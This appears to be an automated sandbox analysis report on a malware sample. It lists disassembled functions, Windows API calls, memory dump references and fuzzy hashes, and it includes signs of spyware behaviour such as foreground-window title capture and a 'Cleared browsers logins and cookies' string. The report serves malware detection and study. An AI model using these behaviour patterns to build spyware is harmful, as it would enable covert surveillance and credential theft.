                                                                                                                                                    • Instruction Fuzzy Hash: BFA17831E043969FD721CF68C890BAEBBE1FF11314F1841EDD9869B681C2B9A981C7D0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D6C1A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                    • Opcode ID: 8c0b663fff8bacc42c97b035440320a0cdf88d4e5f9e7cd5be68a7707df8661c
                                                                                                                                                    • Instruction ID: 92abea83fb4ae8faff396f228fdb4e9832d89d138348399cb7fc3db86e4b379c
                                                                                                                                                    • Opcode Fuzzy Hash: 8c0b663fff8bacc42c97b035440320a0cdf88d4e5f9e7cd5be68a7707df8661c
                                                                                                                                                    • Instruction Fuzzy Hash: 0D415B35F05328ABDB209BB8DC40BAEBBA8EF06370F100A59F464D6590DA74BC00C7E5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C2801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d017d3dd502e7e05423b16404ed333bcfd3c407fba943d06a8ef22091586fd9a
                                                                                                                                                    • Instruction ID: e576cdb1696b39047fdfd9a452d994ee55c23957199f4729eff9e12f9ad96c80
                                                                                                                                                    • Opcode Fuzzy Hash: d017d3dd502e7e05423b16404ed333bcfd3c407fba943d06a8ef22091586fd9a
                                                                                                                                                    • Instruction Fuzzy Hash: F5412676B01344AFD324CF78CC40B5ABBA9EB88710F1046AAE599DB690D6B1B545C7C4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15684CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,156F4F50), ref: 15684DB3
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,?,156F4EF8,00000000,00000000), ref: 15684DC7
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 15684DD2
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 15684DDB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3360349984-0
                                                                                                                                                    • Opcode ID: 346e7dbc1872fec2f7358f5503e7aa6296877007cf602e93a4f65b5f89311bd6
                                                                                                                                                    • Instruction ID: 2e6eb547ff788bb0c99b064f7d282c6cdd16d693598ab622af1203bfbc21d7d8
                                                                                                                                                    • Opcode Fuzzy Hash: 346e7dbc1872fec2f7358f5503e7aa6296877007cf602e93a4f65b5f89311bd6
                                                                                                                                                    • Instruction Fuzzy Hash: FF417C7560A305AFC714EB61CC54DAFB7EDAF94315F400A1DF89292290EB30B909C7A6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DEE1A4 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02DEE253
                                                                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02DEE26F
                                                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02DEE2E6
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 02DEE30F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 920484758-0
                                                                                                                                                    • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                    • Instruction ID: 3d5960d3bd1d26fcfbe2163c765912ba061e2faa9a011305a225b52bedb3d264
                                                                                                                                                    • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                    • Instruction Fuzzy Hash: 7A41D975A016199FCF62EF58C890BD9B3BEEB49214F0081D5E54AA7351DB31AF818F60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • Cleared browsers logins and cookies., xrefs: 1568C0F5
                                                                                                                                                    • [Cleared browsers logins and cookies.], xrefs: 1568C0E4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                    • API String ID: 3472027048-1236744412
                                                                                                                                                    • Opcode ID: f06926f4538bd831a90817749b5347aa5db7046b6a6308503b4e45caf31dbf3b
                                                                                                                                                    • Instruction ID: 4597aec4b666cc399cfa6e1897e2ebad1bf83205ad83b59cd4694dc544f941ac
                                                                                                                                                    • Opcode Fuzzy Hash: f06926f4538bd831a90817749b5347aa5db7046b6a6308503b4e45caf31dbf3b
                                                                                                                                                    • Instruction Fuzzy Hash: DD31E40871E3C16EE6019BB49860BEE7F835E93198F48455DE8C61FA86C9136408DBE7
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DEACF8 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DEAD15
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DEAD39
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(02DE0000,?,00000105), ref: 02DEAD54
                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DEADEA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3990497365-0
                                                                                                                                                    • Opcode ID: a0b5253325c81fab5917128eca25ec4d717e19c025ce809f51d5d3de2c4f68eb
                                                                                                                                                    • Instruction ID: b72c235fb554fd843e2d67c007e136ce88a580b1b5e76d79e548e17cc281139f
                                                                                                                                                    • Opcode Fuzzy Hash: a0b5253325c81fab5917128eca25ec4d717e19c025ce809f51d5d3de2c4f68eb
                                                                                                                                                    • Instruction Fuzzy Hash: CE410471A402599BDF21EB68CC84BDEB7EDAB18301F4040E9A549E7351EB74AF848F60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DEACF6 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DEAD15
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DEAD39
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(02DE0000,?,00000105), ref: 02DEAD54
                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DEADEA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3990497365-0
                                                                                                                                                    • Opcode ID: 98bcbb23370561aed06ea43194a7d3d11b3ac99b16cf4960414869425e727aa1
                                                                                                                                                    • Instruction ID: 42cfcc2694986ddcf52b6add10dade462ef6772ebd2359000a9b8a3599550498
                                                                                                                                                    • Opcode Fuzzy Hash: 98bcbb23370561aed06ea43194a7d3d11b3ac99b16cf4960414869425e727aa1
                                                                                                                                                    • Instruction Fuzzy Hash: E3410671A402599BDF21EB68CC84BDEB7EDEB18341F4040E9A549E7351EB749F848F60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156994C4 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnumDisplayMonitors.USER32(00000000,00000000,156995CF,00000000), ref: 156994F5
                                                                                                                                                    • EnumDisplayDevicesW.USER32(?), ref: 15699525
                                                                                                                                                    • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 1569959A
                                                                                                                                                    • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 156995B7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DisplayEnum$Devices$Monitors
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1432082543-0
                                                                                                                                                    • Opcode ID: 7c88337633759b68f658d207f5706204d6e111c1760663b719dbfbe086658d9d
                                                                                                                                                    • Instruction ID: 81c3ebca114323ae936050d9f25bacb079a7da4fcfe08c7c29ed836c6ae6af43
                                                                                                                                                    • Opcode Fuzzy Hash: 7c88337633759b68f658d207f5706204d6e111c1760663b719dbfbe086658d9d
                                                                                                                                                    • Instruction Fuzzy Hash: 93218E72609354AFD324DA16DC88E9BBBECEBD1660F00052EF455C3150EF71AA09C6E6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1569C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1569C561
                                                                                                                                                      • Part of subcall function 1569C551: GetWindowTextLengthW.USER32(00000000), ref: 1569C56A
                                                                                                                                                      • Part of subcall function 1569C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 1569C594
                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 1568A573
                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 1568A5FD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                    • String ID: [ $ ]
                                                                                                                                                    • API String ID: 3309952895-93608704
                                                                                                                                                    • Opcode ID: 1e71089980d12b8c9724e2408aed87f0f7d1e59242fb91a4a482ba2521ea72e2
                                                                                                                                                    • Instruction ID: 70b81724cd290f78aed1019389133b7b0835f0105736218b882cd10272a50f51
                                                                                                                                                    • Opcode Fuzzy Hash: 1e71089980d12b8c9724e2408aed87f0f7d1e59242fb91a4a482ba2521ea72e2
                                                                                                                                                    • Instruction Fuzzy Hash: AB11CD357193009BC618FB74CC519AFB7A9AF51214F80051CE892925E0FF61BA58C7DB
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569B7FF Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 188215759-0
                                                                                                                                                    • Opcode ID: 27af12f927c82a88b14da247d4328f115cf0f179d04c3b846c580de8a24ea3f3
                                                                                                                                                    • Instruction ID: f8b385ef348e1f5162fd76a43ef2ba7f762002bf82cc54309840e975be380706
                                                                                                                                                    • Opcode Fuzzy Hash: 27af12f927c82a88b14da247d4328f115cf0f179d04c3b846c580de8a24ea3f3
                                                                                                                                                    • Instruction Fuzzy Hash: DD11637A6093456FD308EAB4CDC8DEB77ACAAC4250F440E29F54682050EE65B508C6A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568A675 Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,1568A74D), ref: 1568A6AB
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,1568A74D), ref: 1568A6BA
                                                                                                                                                    • Sleep.KERNEL32(00002710,?,?,?,1568A74D), ref: 1568A6E7
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,1568A74D), ref: 1568A6EE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1958988193-0
                                                                                                                                                    • Opcode ID: 70fffafb0795fcd22715ec4e006f83695e7cf79c97e74a78093c0c55c332b6fa
                                                                                                                                                    • Instruction ID: a61eba6641745f156a070160110f31c2d27ef907cf127fd30750fa1c971e8b53
                                                                                                                                                    • Opcode Fuzzy Hash: 70fffafb0795fcd22715ec4e006f83695e7cf79c97e74a78093c0c55c332b6fa
                                                                                                                                                    • Instruction Fuzzy Hash: F2110630B44754AEE721DA2488E4A1E3BAFBB45270F40040DEA8346985CBE17CD4C7E5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C8566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,156C850D,?,00000000,00000000,00000000,?,156C8839,00000006,FlsSetValue), ref: 156C8598
                                                                                                                                                    • GetLastError.KERNEL32(?,156C850D,?,00000000,00000000,00000000,?,156C8839,00000006,FlsSetValue,156DF160,156DF168,00000000,00000364,?,156C82E7), ref: 156C85A4
                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,156C850D,?,00000000,00000000,00000000,?,156C8839,00000006,FlsSetValue,156DF160,156DF168,00000000), ref: 156C85B2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                    • Opcode ID: 5703900fd903e1813200cf8ac95604db6708292c4ab48a434da5601241d06ccd
                                                                                                                                                    • Instruction ID: cd0fdd90d2ec5e60ba971f7ddd7ccec1ca43b0c8c933ca600d2c077536c7fe8d
                                                                                                                                                    • Opcode Fuzzy Hash: 5703900fd903e1813200cf8ac95604db6708292c4ab48a434da5601241d06ccd
                                                                                                                                                    • Instruction Fuzzy Hash: 50012432B2623AABC7319A38CC94E477B9DFB05AB0B510A69FD05D3640DB60C800CAE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,1568412F,156E5E74), ref: 1569C49E
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,1568412F,156E5E74), ref: 1569C4B2
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,1568412F,156E5E74), ref: 1569C4D7
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,1568412F,156E5E74), ref: 1569C4E5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3919263394-0
                                                                                                                                                    • Opcode ID: 804b48c37dd9985c73f6bc92efd8c59f5252b337b0b46532d7d8510dddb822c9
                                                                                                                                                    • Instruction ID: 832bb013b372c9bafff7ce10dc6cfcf924e2f50fd93edb63b82f8217d4dd7a0b
                                                                                                                                                    • Opcode Fuzzy Hash: 804b48c37dd9985c73f6bc92efd8c59f5252b337b0b46532d7d8510dddb822c9
                                                                                                                                                    • Instruction Fuzzy Hash: CAF049B53562287FF7245A25ECC4EBB379DEB86AB4F01062DFD42A2280CA255D05D1B1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156B9863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 156B987A
                                                                                                                                                      • Part of subcall function 156B9EB2: ___AdjustPointer.LIBCMT ref: 156B9EFC
                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 156B9891
                                                                                                                                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 156B98A3
                                                                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 156B98C7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2633735394-0
                                                                                                                                                    • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                    • Instruction ID: e80968970739928ae46d80b2f44b165c620f327dc30586bb9c5ef492c2d9f05b
                                                                                                                                                    • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                    • Instruction Fuzzy Hash: B301E532601109BBCF029F55CC40EDA3BBAFF88754F018525F95866520D3B6F8A1EBE4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156993E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 156993F0
                                                                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 156993F6
                                                                                                                                                    • GetSystemMetrics.USER32(0000004E), ref: 156993FC
                                                                                                                                                    • GetSystemMetrics.USER32(0000004F), ref: 15699402
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4116985748-0
                                                                                                                                                    • Opcode ID: ce24e2a8fbb4aaf9d4973ababcd28d259fd21ae77be43eeefbad8d66f43a20a8
                                                                                                                                                    • Instruction ID: 05cb643056e60c921e35b0a8ce752d952123532012a5a9827509eb9103f26e30
                                                                                                                                                    • Opcode Fuzzy Hash: ce24e2a8fbb4aaf9d4973ababcd28d259fd21ae77be43eeefbad8d66f43a20a8
                                                                                                                                                    • Instruction Fuzzy Hash: 18F0AFA1F013164FD349DA758890A2F6BD9AFC5560F10093EE6088B280EFB5EC05CBC1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156B8F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 156B8F31
                                                                                                                                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 156B8F36
                                                                                                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 156B8F3B
                                                                                                                                                      • Part of subcall function 156BA43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 156BA44B
                                                                                                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 156B8F50
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
